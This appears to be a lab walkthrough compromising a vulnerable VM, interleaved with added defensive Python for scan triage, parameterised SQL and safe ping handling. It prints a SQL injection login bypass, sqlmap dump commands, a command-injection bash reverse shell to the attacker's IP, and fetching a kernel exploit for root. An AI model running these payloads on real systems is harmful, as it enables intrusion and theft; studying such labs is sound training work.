I. Information gathering
1. Host discovery: sudo arp-scan -l
The target's IP is identified as 192.168.65.135.
2. Port and version scan with nmap: nmap -T4 -A -v 192.168.65.135
Results:
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 854/udp status
|_ 100024 1 857/tcp status
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after: 2010-10-08T00:10:47
| MD5: 01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2021-03-15T03:48:40+00:00; -3h09m38s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
3. Directory scan with nikto: nikto -host http://192.168.65.135/
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- STATUS: Completed 270 requests (~4% complete, 9.0 minutes left): currently in plugin 'Site Files'
- STATUS: Running average: 100 requests: 0.10283 sec, 10 requests: 0.1128 sec.
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time: 2021-03-15 03:34:03 (GMT-4) (61 seconds)
4. Browse port 80 and the paths turned up by the scans.
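The scan output above already contains most of what a defender needs: SSHv1 and SSLv2 enabled, a certificate signed with MD5 that expired in 2010, PUT accepted by CUPS, MySQL reachable from the network, TRACE enabled and an end-of-life PHP. The following script is an added example (not part of the original walkthrough) that parses excerpts of that nmap and nikto text and turns those lines into findings ordered by severity; the two sample strings are constructed excerpts of the output on this page, and the remediation hints are the standard settings for each service.

```python
"""Triage of the nmap and nikto output above.

Added example, not part of the original walkthrough: it parses the scan text and
turns the lines a defender should act on (SSHv1, SSLv2, an MD5-signed and expired
certificate, PUT on CUPS, network-exposed MySQL, TRACE, EOL PHP, directory
indexing) into findings ordered by severity. The two samples are constructed
excerpts of the scan output on this page.
"""
import re
from datetime import datetime

NMAP_SAMPLE = """\
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
443/tcp open ssl/https?
| Signature Algorithm: md5WithRSAEncryption
| Not valid after: 2010-10-08T00:10:47
| SSLv2 supported
631/tcp open ipp CUPS 1.1
|_ Potentially risky methods: PUT
3306/tcp open mysql MySQL (unauthorized)
"""

NIKTO_SAMPLE = """\
+ Retrieved x-powered-by header: PHP/4.3.9
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-3268: /icons/: Directory indexing found.
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
RANK = {"high": 0, "medium": 1, "low": 2}


def parse_nmap(nmap_text):
    """Group the '|' script lines under the open-port line they belong to."""
    ports = []
    for line in nmap_text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "service": m.group(3), "version": m.group(4).strip(),
                          "detail": ""})
        elif line.startswith("|") and ports:
            ports[-1]["detail"] += line.lstrip("|_ ") + "\n"
    return ports


def triage(nmap_text, nikto_text, scan_date):
    """Return (severity, message) findings, highest severity first.

    scan_date is an ISO-8601 string; it decides whether the certificate
    'Not valid after' date counts as expired.
    """
    scanned_at = datetime.fromisoformat(scan_date)
    findings = []
    for p in parse_nmap(nmap_text):
        where = "%d/%s" % (p["port"], p["proto"])
        d = p["detail"]
        if "Server supports SSHv1" in d:
            findings.append(("high", where + ": SSH protocol 1 enabled; set 'Protocol 2' in sshd_config"))
        if "SSLv2 supported" in d:
            findings.append(("high", where + ": SSLv2 enabled; allow TLS 1.2+ only"))
        if "md5WithRSAEncryption" in d:
            findings.append(("medium", where + ": certificate signed with MD5; reissue with SHA-256"))
        m = re.search(r"Not valid after:\s*(\S+)", d)
        if m and datetime.fromisoformat(m.group(1)) < scanned_at:
            findings.append(("medium", where + ": certificate expired on " + m.group(1)))
        if "Potentially risky methods: PUT" in d:
            findings.append(("medium", where + ": PUT accepted by " + p["service"] + "; restrict to local clients"))
        if p["service"] == "mysql":
            findings.append(("medium", where + ": MySQL reachable from the network; bind to 127.0.0.1 or firewall it"))
    if re.search(r"Allowed HTTP Methods:.*\bTRACE\b", nikto_text):
        findings.append(("low", "80/tcp: HTTP TRACE enabled; set 'TraceEnable off'"))
    m = re.search(r"x-powered-by header: PHP/(\d+)\.(\S+)", nikto_text)
    if m:
        version = m.group(1) + "." + m.group(2)
        if int(m.group(1)) < 5:  # PHP 4 has been unsupported since 2008
            findings.append(("high", "80/tcp: PHP " + version + " is end-of-life; upgrade it"))
        else:
            findings.append(("low", "80/tcp: PHP " + version + " disclosed; set expose_php=Off"))
    if "Directory indexing found" in nikto_text:
        findings.append(("low", "80/tcp: directory indexing enabled; set 'Options -Indexes'"))
    return sorted(findings, key=lambda f: (RANK[f[0]], f[1]))


if __name__ == "__main__":
    for severity, message in triage(NMAP_SAMPLE, NIKTO_SAMPLE, "2021-03-15T03:48:40"):
        print("[%-6s] %s" % (severity, message))
```

The parser keeps each port's NSE script lines together, so checks such as "PUT accepted" apply to the service that reported them rather than to the whole scan; the nikto lines are matched globally because nikto only scanned port 80 here.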
II. Vulnerability discovery
1. SQL injection in http://192.168.65.135/index.php
(1) Capture the login request with Burp Suite and fuzz it to confirm the injection
(2) Log in with username=admin, password='or' 1=1--
The login succeeds.
(3) Dump the database with sqlmap (this part is not needed for the box; treat it as sqlmap practice and skip it if you are not interested)
sqlmap -r 12.txt --dbs --level 3 --risk 2 --batch
sqlmap -r 12.txt -D webapp --tables --level 3 --risk 2
sqlmap -r 12.txt -D webapp -T users --columns --level 3 --risk 2
sqlmap -r 12.txt -D webapp -T users -C username,password --dump --level 3 --risk 2
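Why the password 'or' 1=1-- gets past the login: with the input spliced into the SQL text, the condition becomes AND password='' OR ' 1=1--', and MySQL coerces the string ' 1=1--' to the number 1, which is true for every row. The script below is an added example, not code from the target application: it reproduces that behaviour against an in-memory SQLite table (which applies the same leading-number coercion) and contrasts it with a parameterised query, where the identical input is just a wrong password. The table, usernames and stored passwords are constructed for the demo; a real application would store password hashes rather than cleartext.

```python
"""The login bypass above, reproduced against an in-memory SQLite table.

Added example, not code from the target application: it contrasts a query
built by string concatenation, which the payload turns into
  ... AND password='' OR ' 1=1--'
(an always-true string under MySQL's and SQLite's boolean coercion), with a
parameterised query that treats the same input as a plain wrong password.
The table and the stored passwords are constructed for the demo.
"""
import sqlite3

PAYLOAD_USER = "admin"
PAYLOAD_PASS = "'or' 1=1--"  # the payload from the walkthrough


def setup_db():
    """Constructed users table; cleartext passwords only to keep the demo short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "constructed-admin-pw"), ("john", "constructed-john-pw")])
    return conn


def login_vulnerable(conn, username, password):
    """Interpolates user input into the SQL text, so quotes change the query."""
    sql = "SELECT username FROM users WHERE username='%s' AND password='%s'" % (username, password)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Bound parameters keep the input as data; no quoting can alter the query."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD_USER, PAYLOAD_PASS))  # admin
    print("safe:      ", login_safe(db, PAYLOAD_USER, PAYLOAD_PASS))        # None
```

The fix is the placeholder, not input filtering: login_safe never builds SQL from the request, so the -- and the quotes have no syntactic meaning to the database.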
2. Command execution vulnerability
(1) 127.0.0.1|ls
(2) Start a listener on Kali: nc -lvvp 1234
Reverse shell: 127.0.0.1|bash -i >& /dev/tcp/192.168.65.129/1234 0>&1
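The ping feature fails because the address field is joined into one command string and handed to a shell, so a | in the field starts a second command. The script below is an added example, not the target application's code: it shows the vulnerable string construction next to a hardened version that accepts only a literal IP address and runs ping as an argument list with no shell, plus a small helper that reports which shell metacharacters an input contained, the kind of signal a WAF rule or access-log alert would key on. The ping count flag and the non-page inputs are assumptions made for the demo.

```python
"""Input handling for the ping feature abused above.

Added example, not the target application's code. The vulnerable shape passes
one string to the shell, so a '|' in the address field appends a second
command. The hardened shape accepts only a literal IP address and runs ping
with an argument list and no shell. Inputs used in __main__ are the page's
payload plus constructed ones; 'ping -c 3' is an assumed command shape.
"""
import ipaddress
import shutil
import subprocess

SHELL_METACHARS = set("|;&$`<>(){}\n")


def build_command_vulnerable(target):
    """What the vulnerable page effectively hands to /bin/sh -c."""
    return "ping -c 3 " + target


def metachars_in(value):
    """Sorted list of shell metacharacters found in user input (for alerting)."""
    return sorted(SHELL_METACHARS & set(value))


def validate_target(target):
    """Return the normalised IPv4/IPv6 address, or raise ValueError."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        raise ValueError("rejected ping target: %r" % target) from None


def build_command_safe(target):
    """Argument list for subprocess without a shell: no pipes, no word splitting."""
    return ["ping", "-c", "3", validate_target(target)]


def run_ping(target):
    """Run the validated command; returns the exit code, or None if ping is absent."""
    argv = build_command_safe(target)
    if shutil.which("ping") is None:
        return None
    return subprocess.run(argv, capture_output=True, text=True, timeout=15).returncode


if __name__ == "__main__":
    for candidate in ["127.0.0.1", "127.0.0.1|ls", "127.0.0.1; id"]:
        try:
            print(candidate, "->", build_command_safe(candidate))
        except ValueError as err:
            print(candidate, "->", err, "metachars:", metachars_in(candidate))
```

Restricting the field to IP addresses is a design choice for this feature; if hostnames must be accepted, validate them against a strict hostname grammar, but keep the argument-list call so that validation is defence in depth rather than the only barrier.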
(3) Check the system version: uname -a
(4) Search the exploit database; a matching kernel exploit is https://www.exploit-db.com/exploits/9542
(5) Download 9542.c, then have the target fetch it
- First download it to Kali
- Then start an HTTP server:
python -m SimpleHTTPServer 9090
In the reverse shell obtained above, download it:
wget http://192.168.65.129:9090/9542/9542.c
- Then compile it:
gcc 9542.c
Once compiled, run the resulting binary: ./a.out
Privilege escalation succeeds.